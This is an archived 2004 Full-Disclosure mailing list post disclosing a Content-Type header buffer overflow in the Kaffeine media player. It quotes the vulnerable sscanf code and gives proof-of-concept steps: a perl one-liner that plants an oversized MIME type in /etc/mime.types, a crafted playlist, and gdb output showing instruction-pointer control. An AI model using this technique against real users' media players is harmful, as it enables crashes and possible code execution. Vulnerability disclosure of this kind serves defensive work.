[Full-Disclosure] Kaffeine Media Player Conteny Type overflow
From: KF (kfinisterre_at_secnetops.biz)
Date: 10/26/04
- Previous message: Mike Hoye: "Re: [Full-Disclosure] Q: Linux Command Line Encryption"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: fulldis list <full-disclosure@lists.netsys.com> Date: Mon, 25 Oct 2004 20:06:24 -0500
Author did not respond and I could not exploit... enjoy.
there will be a proper advisory when I am not being so lazy
-KF
Kaffeine >=0.4.2
http://kaffeine.sourceforge.net/download.html
Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2
also Tested on various SuSE and Fedora RPMS
On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default
http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html
1558f5f4178cc1acbac0a068fb0bf43c kaffeine.rpm
ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/
kaffeine-0.5cvs-200409180035.i686.rpm
ftp://packman.iu-bremen.de/suse/9.1/i686/
kaffeine-0.4.3b-0.pm.0.i686.rpm
http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players
kaffeine-0.4.2-6.i586.rpm
Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686
http://rpmseek.com/rpm-pl/kaffeine.html?hl=com&cx=0::
kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm
kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm
This can be triggered via any Real Audio Media - ram playlist file.
kaffeine-0.4.3b/kaffeine/playlist.cpp:
These are your file limitations.
PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after)
..
/* check for ram playlist */
if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == "lsc") || (ext == "pl") )
{
...
The overflow occurs here.
kaffeine-0.4.3b/kaffeine/http.c:
static http_t *http_open (const char *mrl) {
http_t *this;
...
if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {
Sample exploitation.
To cause the exploit modify /etc/mimetypes for the .ram extension make it
AAAAAAAAAAAAAAAAAAAAA.... instead of audio/x-pn-realaudio
linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram > /etc/mime.types ; /etc/init.d/apache2 restart
Syntax OK
Shutting down httpd2 (waiting for all children to terminate) done
Starting httpd2 (prefork)
[root@threat root]# kaffeine http://192.168.1.207/test.pl
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'
[root@threat root]# KCrash: Application 'kaffeine' crashing...
create a file named exme.ram in your wwwroot
and create a file named test.pl with the contents:
http://host/exme.ram
Upon reading the test.pl file either via http or via double click kaffeine
will attempt to download the file exme.ram. It will check the mimetype
that the server is offering and procede to copy it into a small buffer.
This can also be exploited by directly viewing the .ram file.
exact eip hit looks like this
gdb) c
Continuing.
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -150400896 (LWP 2328)]
0x080b869c in SubtitleChooser::staticMetaObject ()
(gdb) bt
#0 0x080b869c in SubtitleChooser::staticMetaObject ()
#1 0x5a5a5a5a in ?? ()
#2 0x44434241 in ?? ()
#3 0x097a1200 in ?? ()
#4 0x00000000 in ?? ()
#5 0x00000000 in ?? ()
#6 0x00000000 in ?? ()
#7 0x00000000 in ?? ()
#8 0xfef17b28 in ?? ()
#9 0x09794b70 in ?? ()
#10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#11 0x00000018 in ?? ()
#12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#13 0x096c3770 in ?? ()
#14 0x096c3760 in ?? ()
#15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#16 0xfef17b48 in ?? ()
#17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
Previous frame inner to this frame (corrupt stack?)
(gdb) i f
Stack level 0, frame at 0xfef17ae0:
eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
0x5a5a5a5a
called by frame at 0xfef17ae4
Arglist at 0xfef17ad8, args:
Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
Saved registers:
ebp at 0xfef17ad8, eip at 0xfef17adc
0xfeea9b20: 'A' <repeats 200 times>...
0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD"
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Mike Hoye: "Re: [Full-Disclosure] Q: Linux Command Line Encryption"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
